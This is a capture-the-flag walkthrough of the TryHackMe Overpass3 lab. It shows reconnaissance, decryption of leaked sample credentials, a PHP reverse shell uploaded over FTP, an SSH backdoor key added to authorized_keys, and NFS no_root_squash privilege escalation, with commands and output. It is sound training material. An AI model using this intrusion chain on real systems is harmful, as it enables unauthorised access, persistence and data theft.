Overpass3
Overpass3 is a free room on TryHackMe created by NinjaJc01. It revolves around a story following the Overpass team’s rocky start in infosec and their failed ventures in Overpass and Overpass2.
For this room, the Overpass team has made a web hosting company. Despite this achievement, they seem not to have learnt from their past mistakes and their main web server is extremely vulnerable.
For this room, we are to discover and compromise these vulnerabilites and obtain 3 flags - the Web Flag, the User Flag and the Root Flag.
Analysing the homepage as part of our reconnaissance, we discover possible users that may be useful for account discovery:
- Paradox
- Elf
- MuirlandOracle
- NinjaJc01
In addition, we can perform a scan for services on the server to identify any open ports. We can use rustscan to quickly discover the ports, followed by nmap against the discovered ports to find out any additional information:
> rustscan -a $IP -r 1-65535 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/bob/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.77.223:21
Open 10.10.77.223:22
Open 10.10.77.223:80
....
# Nmap 7.91 scan initiated Fri Jun 18 19:27:40 2021 as: nmap -vvv -p 21,22,80 -sC -sV -oN scan_results.nmap 10.10.77.223
Nmap scan report for 10.10.77.223
Host is up, received syn-ack (0.19s latency).
Scanned at 2021-06-18 19:27:42 EAT for 14s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfSHQR3OtIeAUFx18phN/nfAIQ2uGHuJs0epoqF184E4Xr8fkjSFJHdA6GsVyGUjdlPqylT8Lpa+UhSSegb8sm1So8Nz42bthsftsOxMQVb/tpQzMUfjcxQOiyVmgxfEqs2Zzdv6GtxwgZWhKHt7T369ejxnVrZhn0m6jzQNfRhVoQe/jC20RKvBf8l8s6/SusbZR5SFfsg71KyrSKOXOxs12GhXkdbP32K3sXVEpWgfCfmIZAc2ZxNtL5uPCM4AOfjIFJHl1z9EX04ZjQ1rMzzOh9pD/b+W2mXt2nQGzRPnc8LyGDE0hFtw4+lBCoiH8zIt14S7dwbFFV1mWxbtZXVf7JhPiZDM2vBfqyowsDZ5oc2qyR+JEU4pqeVhRygs41isej/el19G8+ehz4W07KR97eM2omB25JehO7E4tpX1l8Imjs1XjqhhVuGE2tru/p62SRQOKzRZ19MCIFPxleSLorrHq/uuKdvd8j6rm0A9BrCsiB6gmPfal6Kr55vlU=
| 256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAPAji9Nkb2U9TeP47Pz7BEa943WGOeu5XrRrTV0+CS0eGfNQyZkK6ZICNdeov65c2NWFPFsZTFjO8Sg+e2n/lM=
| 256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM/U6Td7C0nC8tiqS0Eejd+gQ3rjSyQW2DvcN0eoMFLS
80/tcp open http syn-ack Apache httpd 2.4.37 ((centos))
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Service Info: OS: Unix
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 18 19:27:56 2021 -- 1 IP address (1 host up) scanned in 16.51 seconds
From the above scans, we notice FTP (21), SSH (22) and HTTP (80) services running on the server.
We proceed to also do a directory search to see whether there are any other hidden directories on the server and come across a backup folder that has a backup file which we can download and examine the contents using an zip utility (I used the 7zip utility).
> gobuster dir -u $IP --wordlist /usr/share/wordlists/dirb/big.txt -o dir_search.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.77.223
[+] Method: GET
[+] Url: http://10.10.77.223 [0/109]
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/18 19:32:24 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 218]
/.htaccess (Status: 403) [Size: 218]
/backups (Status: 301) [Size: 237] [--> http://10.10.77.223/backups/]
/cgi-bin/ (Status: 403) [Size:217]
===============================================================
2021/06/18 19:39:24 Finished
===============================================================
> wget http://$IP/backups/backup.zip
> 7z l backup.zip # Examine contentns of the file using the 7zip utility.
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz (806EC),ASM,AES-NI)
Scanning the drive for archives:
1 file, 13353 bytes (14 KiB)
Listing archive: backup.zip
--
Path = backup.zip
Type = zip
Physical Size = 13353
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-09 00:18:15 ..... 10366 10366 CustomerDetails.xlsx.gpg
2020-11-09 00:16:38 ..... 3522 2645 priv.key
------------------- ----- ------------ ------------ ------------------------
2020-11-09 00:18:15 13888 13011 2 files
> unzip backup.zip # Unzip the contents.
We notice that we have an encrypted Excel file and its encryption key. To access the contents of the Excel file, we will have to import the key using the gpg utility and we can open the file using an Excel-based utility [e.g. Microsoft Excel or LibreOffice]. For my example, I decided to convert the Excel to a CSV file so that I can examine it in the terminal.
> gpg --import priv.key # Import the key for gpg use.
> gpg -o CustomerDetails.xlsx -d CustomerDetails.xlsx.gpg # Decrypt the encrypted excel file.
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
"Paradox <paradox@overpass.thm>"
# Optionally, I used the tool xlsx2csv.py to convert the xlsx file to a CSV and output the contents to the console.
> python xlsx2csv.py CustomerDetails.xlsx > CustomerDetails.csv
> cat CustomerDetails.csv
Customer Name,Username,Password,Credit card number,CVC
Par. A. Doxx,paradox,ShibesAreGreat123,4111 1111 4555 1142,432
0day Montgomery,0day,OllieIsTheBestDog,5555 3412 4444 1115,642
Muir Land,muirlandoracle,A11D0gsAreAw3s0me,5103 2219 1119 9245,737
From the Excel file, we can see username and password details for a number of users. Using paradox’s credentials with the FTP service on the server, we notice that the details are similar to what’s hosted via the web server, that is, it seems the website and additional folders are being hosted from paradox’s account.
We can test to see whether we can upload any information to the server via the ftp account. If this is possible, we can hypothesise that we can try and upload a reverse shell and then try to access it via the browser.
# Let's create a basic file and try and upload it to the server.
> touch test.txt
> ftp $IP 21
Connected to 10.10.234.16.
220 (vsFTPd 3.0.3)
Name (10.10.234.16:bob): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 48 48 24 Nov 08 2020 backups
-rw-r--r-- 1 0 0 65591 Nov 17 2020 hallway.jpg
-rw-r--r-- 1 0 0 1770 Nov 17 2020 index.html
-rw-r--r-- 1 0 0 576 Nov 17 2020 main.css
-rw-r--r-- 1 0 0 2511 Nov 17 2020 overpass.svg
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
## Seems the upload was successful.
## We can upload a customized reverse shell (php-reverse-shell.php from pentestmonkey usually works well).
ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5494 bytes sent in 0.00 secs (36.6398 MB/s)
ftp> bye
221 Goodbye.
With the shell uploaded, we can activate a listener on the attacker machine and trigger the reverse shell on the webserver.
# Establish listener on the attacker machine.
> nc -nlvp 4444
# Output on the attacker machine on triggering the php reverse shell script on the webserver.
listening on [any] 4444 ...
connect to [10.11.16.238] from (UNKNOWN) [10.10.234.16] 36022
Linux ip-10-10-234-16 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
16:29:30 up 20 min, 0 users, load average: 0.00, 0.00, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (885): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ whoami
whoami
apache
sh-4.4$
Given that the apache user has limited privileges, we can use paradox and his password again [password recycling] to laterally move into paradox’s account and gain his privileges. To maintain access, we can create an SSH key that we can add to his authorized_keys list to allow us SSH into his account.
# Let's su into paradox's account and go into his .ssh folder
> su paradox
Password:
> cd ~/.ssh/
ls
authorized_keys
id_rsa.pub
# Create an RSA key on your attacking machine and append it to the 'authorized_keys' file.
> echo 'Put your key in here' | tee -a authorized_keys
# Now SSH into paradox's account using the private key from the attacker machine.
> ssh -i overpass3_rsa paradox@$IP
The authenticity of host '10.10.190.229 (10.10.190.229)' can't be established.
ECDSA key fingerprint is SHA256:Zc/Zqa7e8cZI2SP2BSwt5iLz5wD3XTxIz2SLZMjoJmE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.190.229' (ECDSA) to the list of known hosts.
Last login: Mon Jun 21 08:13:05 2021
[paradox@ip-10-10-190-229 ~]$
Perform a quick ‘find’ to search for the web flag.
> find / -name "*flag*" 2>/dev/null
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/sys/devices/pnp0/00:06/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/vif-0/net/eth0/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/usr/bin/pflags
/usr/sbin/grub2-set-bootflag
/usr/share/man/man1/grub2-set-bootflag.1.gz
/usr/share/httpd/web.flag
> cat /usr/share/httpd/web.flag
txx{xxxxxxxxxxxxxxxxxxxxxxxxxx} # Found the web flag. No spoilers!
We can leverage on the linpeas.sh script to find any potential vulnerability avenues. We can upload the script from our attack machine and execute the script on the victim machine:
#Upload the script using SCP
> scp -i overpass3_rsa linpeas.sh paradox@10.10.190.229:/home/paradox/linpeas.sh
linpeas.sh 100% 333KB 148.3KB/s 00:02
# Run the script
> chmod +x linpeas.sh && ./linpeas
... # [truncated output]
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
... # [truncated output]
Running the script shows us that we have an interesting NFS share that was insecurely mounted. We can attempt to mount this directly on the attacker machine, however, running a showmount command shows that our attacker machine cannot reach the victim machine over this particular protocol.
To resolve this, we will have to create a tunnel. Given that we have already established an SSH backdoor into paradox’s account, we can leverage on this for the tunnel:
# From the attacker machine
> showmount -e $IP
clnt_create: RPC: Unknown host # Seems we can't do an NFS mount directly to our attacker machine.
# We need to determine what port NFS is running on the victim machine
> rpcinfo -p
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
#... [truncated]
100003 3 tcp 2049 nfs # Seems to be running on 2049 over tcp
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100021 1 udp 50798 nlockmgr
100021 3 udp 50798 nlockmgr
#... [truncated]
# Back on the attacker machine, we establish a tunnel and subsequently mount the share
> ssh -i overpass3_rsa paradox@10.10.190.229 -L 2049:localhost:2049
> sudo mount -t nfs localhost:/ /tmp/james
> cd /tmp/james
> cat user.flag
txx{xxxxxxxxxxxxxxxxxxxxxxxxxx} #I've masked the flag
> ls -la .ssh # We can also see we have access to James' ssh keys which we can copy and use.
total 12
drwx------ 2 bob bob 61 Nov 8 2020 .
drwx------ 3 bob bob 112 Jun 21 12:48 ..
-rw------- 1 bob bob 581 Nov 8 2020 authorized_keys
-rw------- 1 bob bob 2610 Nov 8 2020 id_rsa
-rw-r--r-- 1 bob bob 581 Nov 8 2020 id_rsa.pub
The NFS vulnerability allows us to execute a copy of the bash program within the NFS share whilst adopting escalated privileges. We can replicate this by copying a bash program on the attacker machine as ROOT to the share, and logging into james' account via SSH (given that we have the SSH keys) to execute the bash file with the ‘-p’ extension.
# In the mounted share on the attacker machine, let's copy the bash file as the attacker root user and add the SUID root.
> cp /bin/bash /tmp/james && chmod +s /tmp/james/bash
# As we can see James' ssh keys, let's do an SSH directly from the share using his keys.
> ssh -i .ssh/id_rsa james@$IP
Last login: Wed Nov 18 18:26:00 2020 from 192.168.170.145
[james@ip-10-10-190-229 ~]$
# Lastly, let's run the bash script with the '-p' option to maintain the root privileges.
> ./bash -p
\# #[We got root!]
> cat /root/root.flag
txxx{xxxxxxxxxxxxxxxxxxxxxxxx} # Hidden flag
And that about wraps up the room. It's a really good room, though the NFS tripped me up a bit. As a note, when copying the bash file, do log in as root on the attacker machine else the file won't be saved in the share with the necessay root privileges.